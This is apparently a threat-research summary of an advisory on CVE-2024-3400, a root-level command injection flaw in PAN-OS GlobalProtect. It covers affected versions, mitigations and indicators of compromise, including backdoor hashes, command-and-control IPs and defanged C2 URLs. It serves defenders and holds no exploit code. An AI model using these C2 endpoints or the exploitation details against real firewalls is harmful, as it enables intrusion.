Threat Research

Palo Alto Networks PAN-OS Command Injection Vulnerability (CVE-2024-3400) – NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks.

Securonix

NSFOCUS CERT detected a high-severity PAN-OS command injection vulnerability (CVE-2024-3400) in Palo Alto Networks devices that could allow unauthenticated attackers to execute arbitrary code with root privileges via GlobalProtect inputs. Palo Alto Networks has issued a fix and urged users to upgrade; mitigations are available if upgrading is not immediately possible. #CVE-2024-3400 #PANOS #GlobalProtect #PaloAltoNetworks #NSFOCUSCERT

Keypoints

  • Vulnerability CVE-2024-3400 is a command injection flaw in PAN-OS that can be triggered through GlobalProtect gateway/portal input.
  • The flaw has a CVSS score of 10.0 and a public proof-of-concept (PoC) exists, with active exploitation observed.
  • Affected PAN-OS versions span multiple 10.x and 11.x builds; several updates are required for protection.
  • Cloud NGFW, Panorama, and Prisma Access are not affected by this vulnerability.
  • Official mitigation requires upgrading to fixed PAN-OS releases; temporary protections and access restrictions are also recommended if upgrading isn’t possible.
  • Manual detection involves checking GlobalProtect gateway/portals configuration in the firewall UI and reviewing IoCs.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Unauthenticated attackers can construct special packets to execute arbitrary code on the firewall via PAN-OS GlobalProtect due to input not strictly filtered. “Since GlobalProtect gateway or portal configured in PAN-OS does not strictly filter user input, unauthenticated attackers can construct special packets to execute arbitrary code on the firewall with root privileges.”
  • [T1068] Privilege Escalation – Successful exploitation yields code execution with root privileges on the firewall. “execute arbitrary code on the firewall with root privileges.”

Indicators of Compromise

  • [File Hash] Backdoor artifacts – Update.py, 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078
  • [IP Address] Command and Control Infrastructure – 172.233.228.93 and 66.235.168.222
  • [Domain] Hosted Python Backdoor domain – nhdata.s3-us-west-2.amazonaws.com
  • [URL] C2 endpoints – hxxp://172.233.228[.]93/policy, hxxp://172.233.228[.]93/patch
  • [File Name] Indicator – Update.py

Read more: https://nsfocusglobal.com/palo-alto-networks-pan-os-command-injection-vulnerability-cve-2024-3400/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint